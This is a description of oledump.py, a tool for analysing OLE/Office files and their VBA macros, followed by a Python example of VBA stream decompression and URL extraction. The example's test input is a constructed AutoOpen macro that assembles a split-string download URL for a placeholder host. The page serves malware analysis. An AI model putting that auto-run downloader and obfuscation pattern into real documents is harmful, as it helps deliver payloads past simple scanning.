oledump.py is a program to analyze OLE files (Compound File Binary Format). Many applications use this file format; the best known is MS Office: .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP). An OLE file is made up of streams, and oledump allows you to analyze these streams.

Oledump has an embedded man page: run oledump.py -m to view it.

Run oledump.py on an .xls file and it will show you the streams. The letter M next to streams 7, 8, 9 and 10 indicates that the stream contains VBA macros. You can select a stream to dump its content. The source code of VBA macros is compressed when stored inside a stream; use option -v to decompress the VBA macros.

You can write plugins (in Python) to analyze streams. Plugin plugin_http_heuristics.py uses a couple of tricks to extract URLs from malicious, obfuscated VBA macros.

Like many of my analysis programs, oledump.py can analyze a file inside a (password protected) zip file. You might have noticed that the file analyzed in the above screenshot is a zip file.
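Two of the steps above, decompressing the VBA source stored in a module stream (what option -v does) and then hunting for URLs in the decompressed text (what plugin_http_heuristics.py does with more tricks), can be shown in a few dozen lines. The code below is an added example written for this page; it is not oledump.py's or the plugin's own implementation. It implements the MS-OVBA CompressedContainer decompression (0x01 signature, 2-byte chunk headers, flag bytes with literal and copy tokens) and a deliberately small URL heuristic that stitches split string literals (`"htt" & "p://..."`) back together before matching. The compressed sample and the macro text are constructed by hand for the example; the plugin name is from the page, everything else (function names, sample data, the `example.test` host) is assumed.

```python
"""Added example: MS-OVBA decompression plus a simple URL heuristic.
Not oledump.py's code; sample inputs below are constructed for illustration."""
import re
import struct


def decompress_vba(container: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer, the encoding used for the
    source text ('Attribute VB_Name = ...', Sub ..., ...) inside a VBA module stream."""
    if not container or container[0] != 0x01:
        raise ValueError("missing 0x01 CompressedContainer signature")
    out = bytearray()
    pos = 1
    while pos < len(container):
        chunk_start = pos
        header = struct.unpack_from("<H", container, chunk_start)[0]
        chunk_size = (header & 0x0FFF) + 3            # bits 0-11: chunk size - 3
        if (header >> 12) & 0x07 != 0b011:            # bits 12-14: fixed signature
            raise ValueError("bad chunk signature at offset %d" % chunk_start)
        compressed = (header >> 15) & 0x01            # bit 15: 1 = token stream, 0 = raw
        chunk_end = min(len(container), chunk_start + chunk_size)
        pos = chunk_start + 2
        decompressed_chunk_start = len(out)
        if not compressed:
            # Raw chunk: the payload (nominally 4096 bytes) is copied verbatim.
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = container[pos]                    # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if (flags >> bit) & 1 == 0:
                    out.append(container[pos])        # literal token: one byte
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]   # copy token
                pos += 2
                # The offset/length bit split depends on how far into the chunk we are:
                # bit_count = max(ceil(log2(distance)), 4), computed without floats.
                distance = len(out) - decompressed_chunk_start
                bit_count = max((distance - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                for i in range(length):               # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)


# Constructed compressed sample: one compressed chunk (size 61) holding
# 31 literals, one copy token (offset 31, length 13 -> repeats "Attribute VB_"),
# then 19 more literals.
COMPRESSED = (
    b"\x01"                                   # container signature
    + b"\x3a\xb0"                             # chunk header 0xB03A: size 61, sig 0b011, compressed
    + b"\x00" + b"Attribut"
    + b"\x00" + b"e VB_Nam"
    + b"\x00" + b'e = "Mod'
    + b"\x80" + b'ule1"\r\n' + b"\x0a\xf0"    # 7 literals, then copy token 0xF00A
    + b"\x00" + b"Creatabl"
    + b"\x00" + b"e = Fals"
    + b"\x00" + b"e\r\n"
)
PLAIN = b'Attribute VB_Name = "Module1"\r\nAttribute VB_Creatable = False\r\n'

_CONCAT = re.compile(r'"\s*&\s*"')           # "abc" & "def"  ->  "abcdef"
_URL = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def extract_urls(vba_source: str) -> list:
    """Simplified heuristic in the spirit of plugin_http_heuristics.py: join
    split string literals first, then look for URLs in the result."""
    joined = _CONCAT.sub("", vba_source)
    return sorted(set(_URL.findall(joined)))


# Constructed macro text; the host uses the reserved .test TLD.
SAMPLE_MACRO = (
    "Sub AutoOpen()\r\n"
    "    Dim u As String\r\n"
    '    u = "htt" & "p://exam" & "ple.test/update.bin"\r\n'
    "    Call Fetch(u)\r\n"
    "End Sub\r\n"
)

if __name__ == "__main__":
    print(decompress_vba(COMPRESSED).decode("latin-1"))
    print(extract_urls(SAMPLE_MACRO))   # URL visible only after re-joining the literals
```

Running it prints the two decompressed Attribute lines and the single reassembled URL. The decoder accepts both chunk types, so the same function works on streams produced by different VBA versions; the heuristic is intentionally narrow (it only undoes `" & "` splitting), which is why a plain grep over the raw stream finds nothing while the joined text does.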